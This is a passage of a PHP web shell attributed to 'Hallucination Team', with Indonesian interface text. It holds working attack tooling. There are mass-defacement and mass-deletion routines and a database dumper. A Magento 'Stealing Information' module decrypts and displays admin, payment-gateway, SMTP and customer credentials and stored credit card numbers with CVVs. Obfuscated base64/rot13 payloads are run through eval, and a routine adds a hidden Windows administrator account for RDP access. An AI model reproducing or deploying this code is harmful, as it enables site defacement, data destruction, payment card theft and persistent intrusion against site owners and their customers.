858.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
859.     function sabun_massal($dir,$namafile,$isi_script) {
860.         if(is_writable($dir)) {
861.             $dira = scandir($dir);
862.             foreach($dira as $dirb) {
863.                 $dirc = "$dir/$dirb";
864.                 $lokasi = $dirc.'/'.$namafile;
865.                 if($dirb === '.') {
866.                     file_put_contents($lokasi, $isi_script);
867.                 } elseif($dirb === '..') {
868.                     file_put_contents($lokasi, $isi_script);
869.                 } else {
870.                     if(is_dir($dirc)) {
871.                         if(is_writable($dirc)) {
872.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
873.                             file_put_contents($lokasi, $isi_script);
874.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
875.                         }
876.                     }
877.                 }
878.             }
879.         }
880.     }
881.     if($_POST['mass'] == 'onedir') {
882.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
883.         $ini="http://";
884.         $mainpath=$_POST[d_dir];
885.         $file=$_POST[d_file];
886.         $dir=opendir("$mainpath");
887.         $code=base64_encode($_POST[script]);
888.         $indx=base64_decode($code);
889.         while($row=readdir($dir)){
890.         $start=@fopen("$row/$file","w+");
891.         $finish=@fwrite($start,$indx);
892.         if ($finish){
893.             echo"$ini$row/$file\n";
894.             }
895.         }
896.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
897.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
898.         $dir=opendir("$mainpath");
899.         $code=base64_encode($_POST[script]);
900.         $indx=base64_decode($code);
901.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
902.         $finish=@fwrite($start,$indx);
903.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
904.         }
905.  
906.     }
907.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
908.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
909.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
910.     elseif($_POST['mass'] == 'massdeface') {
911.         echo "<div style='margin: 5px auto; padding: 5px'>";
912.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
913.         echo "</div>";  }
914.     else {
915.         echo "
916.         <center><font style='text-decoration: underline;'>
917.         Select Type:<br>
918.         </font>
919.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
920.         <option value=\"onedir\">Mass Deface 1 Dir</option>
921.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
922.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
923.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
924.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
925.         <font style='text-decoration: underline;'>Folder:</font><br>
926.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
927.         <font style='text-decoration: underline;'>Filename:</font><br>
928.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
929.         <font style='text-decoration: underline;'>Index File:</font><br>
930.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Hallucination Team</textarea><br>
931.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
932.         </form></center>";
933.         }
934.     }
935. elseif($_GET['do'] == 'dbdump')
936.     {
937. echo $head.'<p align="center">';
938. echo '
939. <form action method=post>
940. <center>
941. <table width=371 class=tabnet >
942. <tr><th colspan="2">Database Dump</th></tr>
943. <tr>
944.     <td>Server </td>
945.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
946.     <td>Username</td>
947.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
948.     <td>Password</td>
949.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
950.     <td>DataBase Name</td>
951.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
952.     <tr>
953.     <td>DB Type </td>
954.     <td><form method=post action="'.$me.'">
955.     <select class="inputz" name=method>
956.         <option  value="gzip">Gzip</option>
957.         <option value="sql">Sql</option>
958.         </select>
959.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
960.     </form></center></table>';
961. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
962. $date = date("Y-m-d");
963. $dbserver = $_POST['server'];
964. $dbuser = $_POST['username'];
965. $dbpass = $_POST['password'];
966. $dbname = $_POST['dbname'];
967. $file = "Dump-$dbname-$date";
968. $method = $_POST['method'];
969. if ($method=='sql'){
970. $file="Dump-$dbname-$date.sql";
971. $fp=fopen($file,"w");
972. }else{
973. $file="Dump-$dbname-$date.sql.gz";
974. $fp = gzopen($file,"w");
975. }
976. function write($data) {
977. global $fp;
978. if ($_POST['method']=='ssql'){
979. fwrite($fp,$data);
980. }else{
981. gzwrite($fp, $data);
982. }}
983. mysql_connect ($dbserver, $dbuser, $dbpass);
984. mysql_select_db($dbname);
985. $tables = mysql_query ("SHOW TABLES");
986. while ($i = mysql_fetch_array($tables)) {
987.     $i = $i['Tables_in_'.$dbname];
988.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
989.     write($create['Create Table'].";nn");
990.     $sql = mysql_query ("SELECT * FROM ".$i);
991.     if (mysql_num_rows($sql)) {
992.         while ($row = mysql_fetch_row($sql)) {
993.             foreach ($row as $j => $k) {
994.                 $row[$j] = "'".mysql_escape_string($k)."'";
995.             }
996.             write("INSERT INTO $i VALUES(".implode(",", $row).");n");
997.         }
998.     }
999. }
1000. if ($method=='ssql'){
1001. fclose ($fp);
1002. }else{
1003. gzclose($fp);}
1004. header("Content-Disposition: attachment; filename=" . $file);  
1005. header("Content-Type: application/download");
1006. header("Content-Length: " . filesize($file));
1007. flush();
1008.  
1009. $fp = fopen($file, "r");
1010. while (!feof($fp))
1011. {
1012.     echo fread($fp, 65536);
1013.     flush();
1014. }
1015. fclose($fp);
1016.         }
1017.     }
1018. elseif($_GET['do'] == 'magen') {
1019. echo'
1020. <div id="page-wrap">  
1021. <center>  
1022. <br>  
1023. <FORM action=""  method="post">  
1024. <div align="center">[M A G E N T O] - Stealing Information<br>  
1025. <div align="center">coder: Hallucination Team & ./p0tz<br>  
1026. <input type="hidden" name="form_action" value="2">  
1027. </div>  
1028. </div>  
1029. ';  
1030.  
1031.  
1032. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
1033.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
1034.     if(isset($xml->global->resources->default_setup->connection)) {  
1035.        $connection = $xml->global->resources->default_setup->connection;  
1036.        $prefix = $xml->global->resources->db->table_prefix;  
1037.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
1038.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
1039.          
1040.        try {  
1041.            $app = Mage::app('default');  
1042.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
1043.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
1044.  
1045.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
1046.            print("Could not connect: " . mysql_error());  
1047.        }  
1048.        mysql_select_db($connection->dbname);  
1049.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
1050.  
1051.     $crypto = new Varien_Crypt_Mcrypt();  
1052.     $crypto->init($key);  
1053.  
1054.     //=========================================================================================================  
1055.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
1056.     if (!$query){  
1057.           echo "<center><b>Gagal</b></center>";  
1058.     }else{  
1059.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
1060.           echo'<br><br>  
1061.                ====================================================================<br>  
1062.                                [ Admin FROM website : '.$site['website'].'] <br>  
1063.                ====================================================================<br>';  
1064.     }  
1065.     echo "  
1066.    <table border='1' align='center' >  
1067.    <tr>  
1068.    <td>id</td>  
1069.    <td>firstname</td>  
1070.    <td>lastname</td>  
1071.    <td>email</td>  
1072.    <td>username</td>  
1073.    <td>password</td>  
1074.    </tr>";  
1075.         while($vx = mysql_fetch_array($query)) {  
1076.         $no = 1;  
1077.         $user_id = $vx['user_id'];  
1078.         $username = $vx['username'];  
1079.         $password = $vx['password'];  
1080.         $email = $vx['email'];  
1081.         $firstname = $vx['firstname'];  
1082.         $lastname = $vx['lastname'];  
1083.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
1084.         }  
1085.     echo "</table><br>";  
1086.     //=========================================================================================================  
1087.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
1088.     if(mysql_num_rows($query) != 0){  
1089.         if (!$query){  
1090.               echo "<center><b>Gagal</b></center>";  
1091.         }else{  
1092.               echo'<br><br>  
1093.                    ====================================================================<br>  
1094.                                    [ Authorizenet ] <br>  
1095.                    ====================================================================<br>';  
1096.         }  
1097.         echo "  
1098.        <table border='1' align='center' >  
1099.        <tr>  
1100.        <td>no</td>  
1101.        <td>user</td>  
1102.        <td>pass</td>      
1103.        </tr>";  
1104.             $no = 1;  
1105.             while($vx = mysql_fetch_array($query)) {  
1106.             $user = $crypto->decrypt($vx['user']);  
1107.             $pass = $crypto->decrypt($vx['pass']);  
1108.  
1109.              
1110.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
1111.             $no++;  
1112.             }  
1113.         echo "</table><br>";  
1114.     }  
1115.     //=========================================================================================================  
1116.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
1117.     if(mysql_num_rows($query_smtp) != 0){  
1118.         if (!$query_smtp){  
1119.               echo "<center><b>Gagal</b></center>";  
1120.         }else{  
1121.               echo'<br><br>  
1122.                    ====================================================================<br>  
1123.                                    [ SMTP ] <br>  
1124.                    ====================================================================<br>';  
1125.         }  
1126.         echo "  
1127.        <table border='1' align='center' >  
1128.        <tr>  
1129.        <td>no</td>  
1130.        <td>host</td>          
1131.        <td>port</td>  
1132.        <td>user</td>  
1133.        <td>pass</td>      
1134.        </tr>";  
1135.             $no = 1;  
1136.             $batas = 0;  
1137.             while($rows = mysql_fetch_array($query_smtp)) {  
1138.                 $smtphost = $rows[0];  
1139.                 $smtpport = $rows[1];  
1140.                 $smtpuser = $rows[2];  
1141.                 $smtppass = $rows[3];  
1142.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
1143.                 $no++;  
1144.             }  
1145.         echo "</table><br>";  
1146.     }  
1147.     //=========================================================================================================  
1148.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
1149.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
1150.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
1151.           echo'<br><br>  
1152.                ====================================================================<br>  
1153.                                [ Credit Card ] <br>  
1154.                ====================================================================<br>';  
1155.             echo "  
1156.            <table border='1' align='left' >  
1157.            <tr>  
1158.            <td>no</td>  
1159.            <td>Date</td>  
1160.            <td>Credit Owner</td>  
1161.            <td>method</td>  
1162.            <td>Credit Number</td>  
1163.            <td>Credit Exp</td>  
1164.            <td>CVV</td>  
1165.            <td>Address</td>  
1166.            </tr>";  
1167.                 $no = 1;  
1168.                 $batas = 0;  
1169.                 while($vx = mysql_fetch_array($query)){  
1170.                 $date = $vx['updated_at'];  
1171.                 $cc_owner = $vx['cc_owner'];  
1172.                 $method = $vx['method'];  
1173.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
1174.                 $exp = $vx['exp'];          
1175.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
1176.                 $Billing_Address = $vx['Billing Address'];  
1177.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
1178.                 $batas = $no++;  
1179.                 }  
1180.                  
1181.                 while($vx2 = mysql_fetch_array($query2)){  
1182.                     $batas +=1;  
1183.                 $cc_owner = $vx2['cc_owner'];  
1184.                 $method = $vx2['method'];  
1185.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
1186.                 $exp = $vx2['exp'];          
1187.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
1188.                 $Billing_Address = $vx2['Billing Address'];  
1189.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
1190.                  $batas++;  
1191.                 }      
1192.                  
1193.             echo "</table><br>";      
1194.     }  
1195.     //=========================================================================================================  
1196.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
1197.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
1198.      
1199.      
1200.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
1201.         if (!$query){  
1202.               echo "<center><b>Gagal</b></center>";  
1203.         }else{  
1204.               echo'<br><br>  
1205.                    ====================================================================<br>  
1206.                                    [ Customer ] <br>  
1207.                    ====================================================================<br>';  
1208.         }  
1209.         echo "  
1210.        <table border='1' align='center' >  
1211.        <tr>  
1212.        <td>no</td>  
1213.        <td>user</td>  
1214.        <td>pass</td>      
1215.        </tr>";  
1216.             $no = 1;  
1217.             $batas = 0;  
1218.             while($vx = mysql_fetch_array($query)) {  
1219.                 $user = $vx['email'];  
1220.                 $pass = $vx['value'];  
1221.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
1222.                 $batas = $no++;  
1223.             }  
1224.              
1225.             if(mysql_num_rows($query2) != 0 && ($query2)){  
1226.                 while($vx2 = mysql_fetch_array($query2)){  
1227.                     $user = $vx2['customer_email'];  
1228.                     $pass = $crypto->decrypt($vx2['password_hash']);  
1229.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
1230.                         $batas +=1;  
1231.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
1232.                         $batas++;  
1233.                     }  
1234.                 }                  
1235.             }  
1236.          
1237.         echo "</table><br>";  
1238.     }  
1239.     //=========================================================================================================  
1240.   }  
1241. }  
1242. function save($format,$data){  
1243.     $fp = fopen($format, 'a');  
1244.     fwrite($fp, $data);  
1245.     fclose($fp);  
1246. }  
1247. function cekbase64($string){  
1248.         $decoded = base64_decode($string, true);  
1249.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
1250.         if(!base64_decode($string, true)) return false;  
1251.         if(base64_encode($decoded) != $string) return false;  
1252.         return true;//nilai return 1 jika true  
1253.     }  
1254. //----untuk decode password ---/  
1255. class Varien_Crypt_Mcrypt{  
1256.     /**  
1257.      * Constuctor  
1258.      *  
1259.      * @param array $data  
1260.      */  
1261.     public function __construct()  
1262.     {  
1263.     }  
1264.  
1265.     /**  
1266.      * Initialize mcrypt module  
1267.      *  
1268.      * @param string $key cipher private key  
1269.      * @return Varien_Crypt_Mcrypt  
1270.      */  
1271.     public function init($key)  
1272.     {  
1273.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
1274.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
1275.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
1276.  
1277.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
1278.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
1279.             return null;  
1280.         }  
1281.  
1282.         mcrypt_generic_init($this->handler, $key, $iv);  
1283.  
1284.         return $this;  
1285.     }  
1286.  
1287.     /**  
1288.      * Encrypt data  
1289.      *  
1290.      * @param string $data source string  
1291.      * @return string  
1292.      */  
1293.     public function encrypt($data)  
1294.     {  
1295.         if (!$this->handler) {  
1296.             //throw new Varien_Exception('Crypt module is not initialized.');  
1297.             return null;  
1298.         }  
1299.         if (strlen($data) == 0) {  
1300.             return $data;  
1301.         }  
1302.         return base64_encode(mcrypt_generic($this->handler, $data));  
1303.     }  
1304.  
1305.     /**  
1306.      * Decrypt data  
1307.      *  
1308.      * @param string $data encrypted string  
1309.      * @return string  
1310.      */  
1311.     public function decrypt($data)  
1312.     {  
1313.         if (!$this->handler) {  
1314.             //throw new Varien_Exception('Crypt module is not initialized.');  
1315.             return null;  
1316.         }  
1317.         if (strlen($data) == 0) {  
1318.             return $data;  
1319.         }  
1320.         return mdecrypt_generic($this->handler, base64_decode($data));  
1321.     }  
1322.          
1323.    
1324.     /**  
1325.      * Desctruct cipher module  
1326.      *  
1327.      */  
1328.     public function __destruct()  
1329.     {  
1330.         if ($this->handler) {  
1331.             $this->_reset();  
1332.         }  
1333.     }  
1334.  
1335.     protected function _reset()  
1336.     {  
1337.         mcrypt_generic_deinit($this->handler);  
1338.         mcrypt_module_close($this->handler);  
1339.     }  
1340. }  
1341. }
1342. elseif($_GET['do'] == 'zip') {
1343.     echo "<center><h1>Zip Menu</h1>";
1344. function rmdir_recursive($dir) {
1345.     foreach(scandir($dir) as $file) {
1346.        if ('.' === $file || '..' === $file) continue;
1347.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
1348.        else unlink("$dir/$file");
1349.    }
1350.    rmdir($dir);
1351. }
1352. if($_FILES["zip_file"]["name"]) {
1353.     $filename = $_FILES["zip_file"]["name"];
1354.     $source = $_FILES["zip_file"]["tmp_name"];
1355.     $type = $_FILES["zip_file"]["type"];
1356.     $name = explode(".", $filename);
1357.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
1358.     foreach($accepted_types as $mime_type) {
1359.         if($mime_type == $type) {
1360.             $okay = true;
1361.             break;
1362.         }
1363.     }
1364.     $continue = strtolower($name[1]) == 'zip' ? true : false;
1365.     if(!$continue) {
1366.         $message = "Itu Bukan Zip  , , GOBLOK COK";
1367.     }
1368.   $path = dirname(__FILE__).'/';
1369.   $filenoext = basename ($filename, '.zip');
1370.   $filenoext = basename ($filenoext, '.ZIP');
1371.   $targetdir = $path . $filenoext;
1372.   $targetzip = $path . $filename;
1373.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
1374.   mkdir($targetdir, 0777);
1375.     if(move_uploaded_file($source, $targetzip)) {
1376.         $zip = new ZipArchive();
1377.         $x = $zip->open($targetzip);
1378.         if ($x === true) {
1379.             $zip->extractTo($targetdir);
1380.             $zip->close();
1381.  
1382.             unlink($targetzip);
1383.         }
1384.         $message = "<b>Sukses Gan :)</b>";
1385.     } else {   
1386.         $message = "<b>Error Gan :(</b>";
1387.     }
1388. }  
1389. echo '<table style="width:100%" border="1">
1390.  <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
1391. <label>Zip File : <input type="file" name="zip_file" /></label>
1392. <input type="submit" name="submit" value="Upload And Unzip" />
1393. </form>';
1394. if($message) echo "<p>$message</p>";
1395. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/bad_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
1396.     if($_POST['backup']){
1397.     $save=$_POST['save'];
1398.     function Zip($source, $destination)
1399. {
1400.     if (extension_loaded('zip') === true)
1401.     {
1402.         if (file_exists($source) === true)
1403.         {
1404.             $zip = new ZipArchive();
1405.  
1406.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
1407.             {
1408.                 $source = realpath($source);
1409.  
1410.                 if (is_dir($source) === true)
1411.                 {
1412.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
1413.  
1414.                     foreach ($files as $file)
1415.                     {
1416.                         $file = realpath($file);
1417.  
1418.                         if (is_dir($file) === true)
1419.                         {
1420.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
1421.                         }
1422.  
1423.                         else if (is_file($file) === true)
1424.                         {
1425.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
1426.                         }
1427.                     }
1428.                 }
1429.  
1430.                 else if (is_file($source) === true)
1431.                 {
1432.                     $zip->addFromString(basename($source), file_get_contents($source));
1433.                 }
1434.             }
1435.  
1436.             return $zip->close();
1437.         }
1438.     }
1439.  
1440.     return false;
1441. }
1442.     Zip($_POST['dir'],$save);
1443.     echo "Done , Save To <b>$save</b>";
1444.     }
1445.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/bad_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
1446.     if($_POST['extrak']){
1447.     $save=$_POST['save'];
1448.     $zip = new ZipArchive;
1449.     $res = $zip->open($_POST['dir']);
1450.     if ($res === TRUE) {
1451.         $zip->extractTo($save);
1452.         $zip->close();
1453.     echo 'Succes , Location : <b>'.$save.'</b>';
1454.     } else {
1455.     echo 'Gagal Taik :( Ntahlah !';
1456.     }
1457.     }
1458. echo '</tr></table>';  
1459.     }
1460.     elseif($_GET['do'] == 'shellchk') {
1461.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
1462.     } elseif($_GET['do'] == 'loghunter')
1463.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
1464. elseif($_GET['do'] == 'metu') {
1465.    
1466.  
1467. echo '<form action="?dir=$dir&do=metu" method="post">';
1468.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1469.     echo 'Byee !';
1470. } elseif($_GET['do'] == 'krdp_shell') {
1471.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1472.         if($_POST['create']) {
1473.             $user = htmlspecialchars($_POST['user']);
1474.             $pass = htmlspecialchars($_POST['pass']);
1475.             if(preg_match("/$user/", exe("net user"))) {
1476.                 echo "[INFO] -> <font color=#ff0066>user <font color=lime>$user</font> sudah ada</font>";
1477.             } else {
1478.                 $add_user   = exe("net user $user $pass /add");
1479.                 $add_groups1 = exe("net localgroup Administrators $user /add");
1480.                 $add_groups2 = exe("net localgroup Administrator $user /add");
1481.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
1482.                 echo "[ RDP ACCOUNT INFO ]<br>
1483.                ------------------------------<br>
1484.                IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
1485.                Username: <font color=lime>$user</font><br>
1486.                Password: <font color=lime>$pass</font><br>
1487.                ------------------------------<br><br>
1488.                [ STATUS ]<br>
1489.                ------------------------------<br>
1490.                ";
1491.                 if($add_user) {
1492.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1493.                 } else {
1494.                     echo "[add user] -> <font color='#ff0066'>Gagal</font><br>";
1495.                 }
1496.                 if($add_groups1) {
1497.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1498.                 } elseif($add_groups2) {
1499.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1500.                 } elseif($add_groups3) {
1501.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1502.                 } else {
